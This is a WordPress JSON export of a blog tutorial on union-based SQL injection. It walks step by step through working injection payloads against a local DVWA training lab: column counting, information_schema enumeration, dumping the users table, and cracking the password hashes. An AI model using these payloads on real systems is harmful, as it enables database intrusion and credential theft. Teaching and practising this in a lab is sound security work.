{"id":234,"date":"2021-09-25T17:56:36","date_gmt":"2021-09-25T17:56:36","guid":{"rendered":"http:\/\/softwaretestingtutorials.com\/?p=234"},"modified":"2024-09-28T00:19:58","modified_gmt":"2024-09-28T00:19:58","slug":"union-based-sql-injection","status":"publish","type":"post","link":"https:\/\/www.techmaximize.com\/blog\/union-based-sql-injection\/","title":{"rendered":"UNION BASED SQL INJECTION"},"content":{"rendered":"\n<blockquote class=\"wp-block-quote\"><p>Union-based SQL injection is a technique in which an attacker appends a UNION SELECT clause to the application's own query, so that the rows of a second, attacker-chosen query are merged into the result set the page already displays. The extra query is delivered through an input that the application concatenates into its SQL without escaping or parameterisation.<\/p><\/blockquote>\n\n\n\n<h2>METHODS USED IN WEB APPLICATIONS<\/h2>\n\n\n\n<ul><li><strong>GET &#8211;<\/strong> The request parameters travel in the URL's query string, so they are visible in the address bar, kept in browser history, written to server and proxy access logs, and leaked to other sites in the Referer header. Anyone shoulder surfing can read them, which is why credentials must never be sent this way. For an attacker, GET parameters are the easiest injection points to find and to test, because a whole payload fits in a single URL.<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>eg: www.aaab.com\/haha.php?id=1\n    www.adsadsa.com\/index.php?happyness=null\n<\/code><\/pre>\n\n\n\n<ul><li><strong>POST &#8211;<\/strong> The request parameters travel in the request body instead of the URL, so they do not appear in the address bar or in ordinary access logs. This is not secrecy: without TLS the body is just as readable on the wire, and a POST parameter that is concatenated into a query is exactly as injectable as a GET one; it only takes an intercepting proxy or a crafted form to tamper with it.<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>eg: twitter.com\/login.php<\/code><\/pre>\n\n\n\n<h2>Union Based SQL Injection Guide Step by Step<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 1<\/strong> \nFind a GET parameter whose value the application passes to the database. Typical shapes:\n\t\tsomething=something\n\t\tphp?id=something\n\t\tphp?id=cat\n\t\tphp?id=1\n\t\tphp?id=query\nEither click a link inside the web application or submit something in a search box, then look at the resulting URL.\nIn DVWA the SQL Injection page takes its id from the query string:\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1&amp;Submit=Submit#<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 
2<\/strong>\nBreak the query with a stray single quote to confirm that the input reaches the SQL parser unescaped.\n\t1'\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1'&amp;Submit=Submit#\n\nYou have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1\n\nWhy it breaks: the application wraps the value in its own quotes, so the injected quote closes the string early and leaves one quote unmatched.\n\tselect * from table where id = '1'      intended query\n\tselect * from table where id = '1''     with the injected quote: the string ends after 1 and a dangling quote remains\nA verbose error like this one also leaks the database engine (MariaDB), which decides the syntax used in the following steps. If the application hides errors, look instead for a difference between the page returned for 1 and the page returned for 1'.<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 3\n<\/strong>Count the columns of the vulnerable SELECT with ORDER BY. The UNION in the next step must have exactly this many columns.\n\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1' order by 1--+&amp;Submit=Submit#\nPage renders normally\nThe database is asked to sort the result by its first column, which exists.\n\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1' order by 2--+&amp;Submit=Submit#\nPage renders normally\nThe database is asked to sort by the second column, which also exists.\n\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1' order by 3--+&amp;Submit=Submit#\nError - Unknown column '3' in 'order clause'\nThe result has no third column, so sorting by it fails.\n\norder by n--+\nStart with n = 1 and increase it until the first error; the column count is n - 1.\n--+ -> comment out the rest of the query:\nanything the application appends after the injected value (here its closing quote) is ignored by the parser; 
we can also use # to comment out the rest of the query (in a URL it must be sent as %23, otherwise the browser treats it as a fragment and never sends it). MySQL and MariaDB only treat -- as a comment when it is followed by whitespace; the + in --+ decodes to a space on the server, which is why that form survives URL encoding.\n\nThe vulnerable SELECT returns 2 columns.<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 4\n<\/strong>Append a UNION SELECT with the same number of columns, so that a row of the attacker's choosing is merged into the rows the page displays.\nunion select 1,2,...,n-1--+\nn=3\nunion select 1,2--+\n\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1' union select 1,2--+&amp;Submit=Submit#\nID: 1' union select 1,2-- \nFirst name: admin\nSurname: admin\n\nID: 1' union select 1,2-- \nFirst name: 1\nSurname: 2\n\nThe second block is the injected row. The numbers tell you which columns the page reflects: here both 1 and 2 are printed, so either position can carry the expressions used from now on.\n\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1' union select database(),version()--+&amp;Submit=Submit#\ndatabase() \/\/name of the database the application is connected to\nversion() \/\/database server version, which confirms the engine before querying information_schema<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 5\n<\/strong>Query information_schema to list the table names.\ninformation_schema -> the metadata schema that MySQL and MariaDB maintain automatically; it describes every database, table and column the current account is allowed to see.\ninformation_schema.tables -> one row per table, with the table name in table_name and the owning database in table_schema.\n\nunion select table_name,2 from information_schema.tables--+\n\t\t\tor\nunion select 1,table_name from information_schema.tables--+\n\nEither form works here because both columns are reflected in the page; otherwise put table_name in whichever column is displayed. On a real target this lists the system tables as well; restrict it to the application's own database with\nunion select 1,table_name from information_schema.tables where table_schema=database()--+\n\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1' union select 1,table_name from information_schema.tables--+&amp;Submit=Submit#<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 6\n<\/strong>Query information_schema again, this time for the column names of the users table:\n\tinformation_schema\n\tinformation_schema.columns\n\nunion select 1,column_name from information_schema.columns where table_name=\"users\"--+\n\nMySQL accepts double quotes around a string literal in its default sql_mode; if the server runs with ANSI_QUOTES, write table_name='users' instead.<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 7<\/strong>\nDump the data using the table and column names found above.\nDVWA -> 
users(user_id, first_name, last_name, user, password)\n\nunion select 1,group_concat(user_id,0x0a,first_name,0x0a,last_name,0x0a,user,0x0a,password,0x3a) from users--+\n\ngroup_concat() collapses every row into one string, so the whole table arrives in the single reflected column. 0x0a and 0x3a are hex string literals for a newline and a colon, used as separators so the fields stay readable when the page prints the value. MySQL truncates group_concat() output at group_concat_max_len (1024 bytes by default); if the dump looks cut off, request fewer columns per query.<\/code><\/pre>\n\n\n\n<p>The password column holds hashes rather than cleartext (DVWA stores unsalted MD5), so the last step is to look each hash up in a public hash database or crack it offline against a wordlist.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Union based SQL injection where an attacker uses the union command to collect the information and merge it<\/p>\n","protected":false},"author":1,"featured_media":249,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[27],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/posts\/234"}],"collection":[{"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/comments?post=234"}],"version-history":[{"count":19,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/posts\/234\/revisions"}],"predecessor-version":[{"id":270,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/posts\/234\/revisions\/270"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/media\/249"}],"wp:attachment":[{"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/media?parent=234"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/categories?post=234"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/tags?post=234"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}